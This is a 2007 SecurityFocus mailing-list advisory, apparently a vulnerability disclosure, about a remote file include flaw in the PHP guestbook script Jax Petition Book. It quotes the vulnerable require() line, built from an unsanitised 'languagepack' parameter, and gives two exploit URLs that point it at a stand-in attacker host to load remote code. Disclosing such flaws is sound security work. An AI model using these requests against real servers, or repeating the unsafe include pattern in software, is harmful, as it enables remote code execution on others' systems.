Jax Petition Book (languagepack) Remote File Include Vulnerabilities Jan 14 2007 06:30PM
ilkerkandemir mynet com (1 replies)
------------------------------------------------------------------------
------------------------------------------

AYYILDIZ.ORG PreSents...

*Script: Jax Petition Book
*Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip

*Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

------------------------------------------------------------------------
-------------------------------------------

*Code:

require ( "language/" .$languagepack . ".inc.php" );

------------------------------------------------------------------------
-------------------------------------------

*Exploit:

jax_petitionbook.php?languagepack=http://attacker.txt?
smileys.php?languagepack=http://attacker.txt?

------------------------------------------------------------------------
-------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
Special Tnx: AYYILDIZ.ORG

[ reply ]
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities Jan 15 2007 10:13PM
bmatheny mobocracy net (1 replies)
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities Jan 16 2007 06:51PM
John McGuire (bugtraq greeneandassoc com)


 

Privacy Statement
Copyright 2010, SecurityFocus